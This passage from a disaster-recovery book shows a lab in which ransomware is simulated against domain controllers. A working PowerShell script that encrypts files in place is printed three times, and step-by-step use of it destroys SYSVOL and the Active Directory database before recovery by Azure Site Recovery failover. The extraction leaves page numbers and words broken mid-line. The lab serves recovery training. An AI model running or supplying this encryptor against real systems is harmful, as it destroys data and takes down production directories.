Add-Type -AssemblyName System.Windows.Forms $FolderBrowser = New-Object System.Windows.Forms.FolderBrowserDialog [void]$FolderBrowser.ShowDialog() $FolderBrowser.SelectedPath #global variables $csv = "C:\windows\temp\drives.csv" #Define the cert to use for encryption #Create your own cert with this command; New-SelfSignedCertificate -certstorelocation cert:\localmachine\my -dnsname ransomware.mmsmoa.local $Cert = $(Get-ChildItem Cert:\LocalMachine\My\60BD2E50C9EB3937CB3DA6FBF2C5ACC925F3C00A) $Cert #discover the other folders beneath the selectedpath $FilesToEncrypt = Get-ChildItem -recurse -Force -Path $FolderBrowser.SelectedPath | Where-Object { !($_.PSIsContainer -eq $true) -and ( $_.Name -like "*$fileName*") } | % {$_.FullName} -ErrorAction SilentlyContinue $FilestoEncrypt Function Encrypt-File { Param([Parameter(mandatory=$true)][System.IO.FileInfo]$FilesToEncrypt, [Parameter(mandatory=$true)][System.Security.Cryptography.X509Certificates.X509C ertificate2]$Cert) Try { [System.Reflection.Assembly]::LoadWithPartialName("System.Security.Cryptography" ) } Catch { Write-Error "Could not load required assembly."; Return } $AesProvider = New-Object System.Security.Cryptography.AesManaged $AesProvider.KeySize = 256 $AesProvider.BlockSize = 128 $AesProvider.Mode = [System.Security.Cryptography.CipherMode]::CBC $KeyFormatter = New-Object System.Security.Cryptography.RSAPKCS1KeyExchangeFormatter($Cert.PublicKey.Key) [Byte[]]$KeyEncrypted = $KeyFormatter.CreateKeyExchange($AesProvider.Key, $AesProvider.GetType()) [Byte[]]$LenKey = $Null [Byte[]]$LenIV = $Null [Int]$LKey = $KeyEncrypted.Length $LenKey = [System.BitConverter]::GetBytes($LKey) [Int]$LIV = $AesProvider.IV.Length

164

Chapter 7 Recovering from Ransomware using Azure Site Recovery

$LenIV = [System.BitConverter]::GetBytes($LIV) $FileStreamWriter Try { $FileStreamWriter = New-Object System.IO.FileStream("$($env:temp+$FilesToEncrypt.Name)", [System.IO.FileMode]::Create) } Catch { Write-Error "Unable to open output file for writing."; Return } $FileStreamWriter.Write($LenKey, 0, 4) $FileStreamWriter.Write($LenIV, 0, 4) $FileStreamWriter.Write($KeyEncrypted, 0, $LKey) $FileStreamWriter.Write($AesProvider.IV, 0, $LIV) $Transform = $AesProvider.CreateEncryptor() $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($FileStreamWriter, $Transform, [System.Security.Cryptography.CryptoStreamMode]::Write) [Int]$Count = 0 [Int]$Offset = 0 [Int]$BlockSizeBytes = $AesProvider.BlockSize / 8 [Byte[]]$Data = New-Object Byte[] $BlockSizeBytes [Int]$BytesRead = 0 Try { $FileStreamReader = New-Object System.IO.FileStream("$($FilesToEncrypt.FullName)", [System.IO.FileMode]::Open) } Catch { Write-Error "Unable to open input file for reading."; Return } Do { $Count = $FileStreamReader.Read($Data, 0, $BlockSizeBytes) $Offset += $Count $CryptoStream.Write($Data, 0, $Count) $BytesRead += $BlockSizeBytes } While ($Count -gt 0) $CryptoStream.FlushFinalBlock() $CryptoStream.Close() $FileStreamReader.Close() $FileStreamWriter.Close() copy-Item -Path $($env:temp+$FilesToEncrypt.Name) -Destination $FilesToEncrypt.FullName -Force } #Encrypt each file foreach ($file in $FilesToEncrypt) { Write-Host "Encrypting $file" Encrypt-File $file $Cert -ErrorAction SilentlyContinue } Exit

Encrypting the Sysvol Folder

165

Chapter 7 Recovering from Ransomware using Azure Site Recovery

Instructions

Screenshot (if applicable)

1. Logon to DC01 as Administrator 2. Open PowerShell ISE and run as Administrator 3. Browse to C:\windows\Sysvol and click ok

Add-Type -AssemblyName System.Windows.Forms $FolderBrowser = New-Object System.Windows.Forms.FolderBrowserDialog [void]$FolderBrowser.ShowDialog() $FolderBrowser.SelectedPath

4. Create a new Self Signed Certificate 5. Copy the thumbprint to the clipboard

New-SelfSignedCertificate -certstorelocation cert:\localmachine\my -dnsname ransomware.mmsmoa.local

166

Chapter 7 Recovering from Ransomware using Azure Site Recovery

6. Run the following to put the Certificate into the $Cert Variable

$Cert = $(Get-ChildItem Cert:\LocalMachine\My\7BD220D0D93475829CD40B4C1A67C2C 89DA4DBCD) $Cert

7. Then Grab the files from the folder

$FilesToEncrypt = Get-ChildItem -recurse -Force -Path $FolderBrowser.SelectedPath | Where-Object { !($_.PSIsContainer -eq $true) } | % {$_.FullName} ErrorAction SilentlyContinue $FilestoEncrypt

8. Run the Encrypt-File Function

Function Encrypt-File { Param([Parameter(mandatory=$true)][System.IO.FileInfo ]$FilesToEncrypt, [Parameter(mandatory=$true)][System.Security.Cryptogr aphy.X509Certificates.X509Certificate2]$Cert) Try { [System.Reflection.Assembly]::LoadWithPartialName("Sy stem.Security.Cryptography") } Catch { Write-Error "Could not load required assembly."; Return } $AesProvider = New-Object System.Security.Cryptography.AesManaged $AesProvider.KeySize = 256 $AesProvider.BlockSize = 128 $AesProvider.Mode = [System.Security.Cryptography.CipherMode]::CBC $KeyFormatter = New-Object System.Security.Cryptography.RSAPKCS1KeyExchangeForma tter($Cert.PublicKey.Key) [Byte[]]$KeyEncrypted = $KeyFormatter.CreateKeyExchange($AesProvider.Key, $AesProvider.GetType()) [Byte[]]$LenKey = $Null [Byte[]]$LenIV = $Null [Int]$LKey = $KeyEncrypted.Length $LenKey = [System.BitConverter]::GetBytes($LKey)

167

Chapter 7 Recovering from Ransomware using Azure Site Recovery

[Int]$LIV = $AesProvider.IV.Length $LenIV = [System.BitConverter]::GetBytes($LIV) $FileStreamWriter Try { $FileStreamWriter = New-Object System.IO.FileStream("$($env:temp+$FilesToEncrypt.Nam e)", [System.IO.FileMode]::Create) } Catch { Write-Error "Unable to open output file for writing."; Return } $FileStreamWriter.Write($LenKey, 0, 4) $FileStreamWriter.Write($LenIV, 0, 4) $FileStreamWriter.Write($KeyEncrypted, 0, $LKey) $FileStreamWriter.Write($AesProvider.IV, 0, $LIV) $Transform = $AesProvider.CreateEncryptor() $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($FileStream Writer, $Transform, [System.Security.Cryptography.CryptoStreamMode]::Writ e) [Int]$Count = 0 [Int]$Offset = 0 [Int]$BlockSizeBytes = $AesProvider.BlockSize / 8 [Byte[]]$Data = New-Object Byte[] $BlockSizeBytes [Int]$BytesRead = 0 Try { $FileStreamReader = New-Object System.IO.FileStream("$($FilesToEncrypt.FullName)", [System.IO.FileMode]::Open) } Catch { Write-Error "Unable to open input file for reading."; Return } Do { $Count = $FileStreamReader.Read($Data, 0, $BlockSizeBytes) $Offset += $Count $CryptoStream.Write($Data, 0, $Count) $BytesRead += $BlockSizeBytes } While ($Count -gt 0) $CryptoStream.FlushFinalBlock() $CryptoStream.Close() $FileStreamReader.Close() $FileStreamWriter.Close() copy-Item -Path $($env:temp+$FilesToEncrypt.Name) -Destination $FilesToEncrypt.FullName -Force }

9. Try Encrypting your files

168

foreach ($file in $FilesToEncrypt) { Write-Host "Encrypting $file" Encrypt-File $file $Cert -ErrorAction SilentlyContinue

Chapter 7 Recovering from Ransomware using Azure Site Recovery

}

10. Verify that the files are indeed encrypted

11. Test GPUpdate from a client for interesting results. Here is before.

169

Chapter 7 Recovering from Ransomware using Azure Site Recovery

12. Here is after the Sysvol was Encrypted 13. We had a scenario like this at one client and didn’t have a good backup of the Domain Controller. We we able to use DCGPOFix.exe to overwrite the default domain and default domain controller policy to start over.

14. Next, we replicated Active Directory to push our encrypted files out to all domain controllers.

15. Verified on DC02 that the Sysvol was encrypted

170

Chapter 7 Recovering from Ransomware using Azure Site Recovery

Taking Down Production Killing Domain Controllers with Ransomware In this scenario, we are going to target the Active Directory Database files which are by default located in c:\Windows\NTDS. We will use the steps performed below to take down all of the Domain Controllers in our lab leaving us no choice but to restore from backup or failover to a DR site like Azure.

Encrypting the Active Directory Database Instructions

Screenshot (if applicable)

1. Logon to DC01 as Administrator 2. Open PowerShell ISE and run as Administrator 3. Browse to C:\windows\NTDS and click ok

Add-Type -AssemblyName System.Windows.Forms $FolderBrowser = New-Object System.Windows.Forms.FolderBrowserDialog [void]$FolderBrowser.ShowDialog() $FolderBrowser.SelectedPath

171

Chapter 7 Recovering from Ransomware using Azure Site Recovery

4. Create a new Self Signed Certificate 5. Copy the thumbprint to the clipboard

New-SelfSignedCertificate -certstorelocation cert:\localmachine\my -dnsname ransomware.mmsmoa.local

6. Run the following to put the Certificate into the $Cert Variable

$Cert = $(Get-ChildItem Cert:\LocalMachine\My\7BD220D0D93475829CD40B4C1A67C2C 89DA4DBCD) $Cert

7. Then Grab the files from the folder

$FilesToEncrypt = Get-ChildItem -recurse -Force -Path $FolderBrowser.SelectedPath | Where-Object { !($_.PSIsContainer -eq $true) } | % {$_.FullName} ErrorAction SilentlyContinue

172

Chapter 7 Recovering from Ransomware using Azure Site Recovery

$FilestoEncrypt

8. Run the Encrypt-File Function

Function Encrypt-File { Param([Parameter(mandatory=$true)][System.IO.FileInfo ]$FilesToEncrypt, [Parameter(mandatory=$true)][System.Security.Cryptogr aphy.X509Certificates.X509Certificate2]$Cert) Try { [System.Reflection.Assembly]::LoadWithPartialName("Sy stem.Security.Cryptography") } Catch { Write-Error "Could not load required assembly."; Return } $AesProvider = New-Object System.Security.Cryptography.AesManaged $AesProvider.KeySize = 256 $AesProvider.BlockSize = 128 $AesProvider.Mode = [System.Security.Cryptography.CipherMode]::CBC $KeyFormatter = New-Object System.Security.Cryptography.RSAPKCS1KeyExchangeForma tter($Cert.PublicKey.Key) [Byte[]]$KeyEncrypted = $KeyFormatter.CreateKeyExchange($AesProvider.Key, $AesProvider.GetType()) [Byte[]]$LenKey = $Null [Byte[]]$LenIV = $Null [Int]$LKey = $KeyEncrypted.Length $LenKey = [System.BitConverter]::GetBytes($LKey) [Int]$LIV = $AesProvider.IV.Length $LenIV = [System.BitConverter]::GetBytes($LIV) $FileStreamWriter Try { $FileStreamWriter = New-Object System.IO.FileStream("$($env:temp+$FilesToEncrypt.Nam e)", [System.IO.FileMode]::Create) } Catch { Write-Error "Unable to open output file for writing."; Return } $FileStreamWriter.Write($LenKey, 0, 4) $FileStreamWriter.Write($LenIV, 0, 4)

173

Chapter 7 Recovering from Ransomware using Azure Site Recovery

$FileStreamWriter.Write($KeyEncrypted, 0, $LKey) $FileStreamWriter.Write($AesProvider.IV, 0, $LIV) $Transform = $AesProvider.CreateEncryptor() $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($FileStream Writer, $Transform, [System.Security.Cryptography.CryptoStreamMode]::Writ e) [Int]$Count = 0 [Int]$Offset = 0 [Int]$BlockSizeBytes = $AesProvider.BlockSize / 8 [Byte[]]$Data = New-Object Byte[] $BlockSizeBytes [Int]$BytesRead = 0 Try { $FileStreamReader = New-Object System.IO.FileStream("$($FilesToEncrypt.FullName)", [System.IO.FileMode]::Open) } Catch { Write-Error "Unable to open input file for reading."; Return } Do { $Count = $FileStreamReader.Read($Data, 0, $BlockSizeBytes) $Offset += $Count $CryptoStream.Write($Data, 0, $Count) $BytesRead += $BlockSizeBytes } While ($Count -gt 0) $CryptoStream.FlushFinalBlock() $CryptoStream.Close() $FileStreamReader.Close() $FileStreamWriter.Close() copy-Item -Path $($env:temp+$FilesToEncrypt.Name) -Destination $FilesToEncrypt.FullName -Force }

9. Try Encrypting your files

174

foreach ($file in $FilesToEncrypt) { Write-Host "Encrypting $file" Encrypt-File $file $Cert -ErrorAction SilentlyContinue }

Chapter 7 Recovering from Ransomware using Azure Site Recovery

10. Let’s see if it worked. Try opening Active Directory users and computers. It appears to be still working.

11. Stop the Active Directory Domain Services Service

175

Chapter 7 Recovering from Ransomware using Azure Site Recovery

12. Try Encrypting the C:\Windows\NTDS folder again

13. Now try to restart the Active Directory Domain Services Service.

14. We can see that the service won’t start with a weird error 0xc0000001: 0xc0000001

15. We can see that Active Directory Users and computer is not operational

176

Chapter 7 Recovering from Ransomware using Azure Site Recovery

16. Repeat the steps on DC02

17. Both DC’s are dead we should try rebooting right. Sure why not.

18. We now have all of our DC’s in a non-bootable state with Blue Screens

19. The attack has succeeded, and all domain controllers are dead.

177

Chapter 7 Recovering from Ransomware using Azure Site Recovery

Survival Mode Recovering to Azure Remember we talked about a narrow window to recover to Azure. If you outrun your recovery points all of your data in the cloud will be encrypted as well. What is required at this point at a minimum is to plan to proceed and execute quickly with a cloud recovery strategy?

As you can see from the screenshot above that our replication is still running to Azure. Azure Site Recovery doesn’t understand that anything bad has happened. Soon enough all of our DC’s in our Recovery Vault will also have rolling blue screens. 178

Chapter 7 Recovering from Ransomware using Azure Site Recovery

Tick Tock time to make a decision – We are Recovering to Azure Ok, so the decision has been made we have been asked to proceed with Azure-based recovery. We had created a Recovery Plan in Azure Site Recovery, but Recovery Plans can only be used to Failover to the last Recovery Point. This will not work for us in this situation.

179

Chapter 7 Recovering from Ransomware using Azure Site Recovery

Performing the Double Swing Recovery The double swing migration method is extremely useful in situations like this. We will first fail the Virtual Machines over to our Azure Tenant. Validate that everything is ok and then bring them back on-prem to save the day.

Instructions

1. Logon to your Azure Tenant and browse to your recovery vault. 2. Click on replicated items 3. Click on DC01 and click Failover 4. After we have validated the Virtual Machines we need to Commit then to Azure

5. Now we will use a Planned Failover to move the Virtual machines back on-prem.

180

Screenshot (if applicable)

Chapter 7 Recovering from Ransomware using Azure Site Recovery

6. On the planned failover window validate the options and click ok.

181

Chapter 7 Recovering from Ransomware using Azure Site Recovery

7. Repeat the steps on DC02 and wait approximately 45 minutes. In the mean time, we will have a look at a few things.

8. You can see the status of the Planned Failover

9. Viewing the Job status in Hyper-V Manager

182

Chapter 7 Recovering from Ransomware using Azure Site Recovery

10. You can view the progress of the replication by checking cbengine.exe in Resource Monitor.

11. We can also enable debug logging to see what is happening.

logman create trace ASRDebug -v mmddhhmm -o C:\temp\asr.etl -cnf 01:00:00 -nb 10 250 -bs 16 -ow y logman update ASRDebug -p "Microsoft-Azure Site Recovery-Provider" 0x8000000000000000 0x5 logman update ASRDebug -p "MicrosoftAzureRecoveryServices" 0xC000000000000000 0x5 logman start ASRDebug logman stop ASRDebug netsh trace convert C:\temp\asr_04132122.etl

183

Chapter 7 Recovering from Ransomware using Azure Site Recovery

12. After a while, you can see the planned failover succeeded we have to hit Complete Failover

13. Hit Complete Failover

184

Chapter 7 Recovering from Ransomware using Azure Site Recovery

14. You can view the status of the replication in Hyper-V Manager

15. You can see the progress in Azure with the Failback

16. We can see the Domain Controllers back online now. 17. The real test is to see if Active Directory is working now.

185

Chapter 7 Recovering from Ransomware using Azure Site Recovery

18. We can also see that our Sysvol is now fixed.

186

Chapter 7 Recovering from Ransomware using Azure Site Recovery

187

Chapter 8 Disaster Recovery items left forgotten

Chapter 8

Disaster Recovery items left forgotten

188

Chapter 9 Join us at MVPDays and meet great MVP’s like this in person

Chapter 9

Join us at MVPDays and meet great MVP’s like this in person If you liked their book, you would love to hear them in person.

Live Presentations Dave frequently speaks at Microsoft conferences around North America, such as TechEd, VeeamOn, TechDays, and MVPDays Community Roadshow. Cristal runs the MVPDays Community Roadshow. You can find additional information on the following blog: www.checkyourlogs.net www.mvpdays.com

Video Training For video-based training, see the following site: www.mvpdays.com

189

Chapter 9 Join us at MVPDays and meet great MVP’s like this in person

Live Instructor-led Classes Dave has been a Microsoft Certified Trainer (MCT) for more than 15 years and presents scheduled instructor-led classes in the US and Canada. For current dates and locations, see the following sites: 

www.truesec.com



www.checkyourlogs.net

Consulting Services Dave and Cristal have worked with some of the largest companies in the world and had a wealth of experience and expertise. Customer engagements are typically between two weeks and six months.

190

Chapter 9 Join us at MVPDays and meet great MVP’s like this in person

191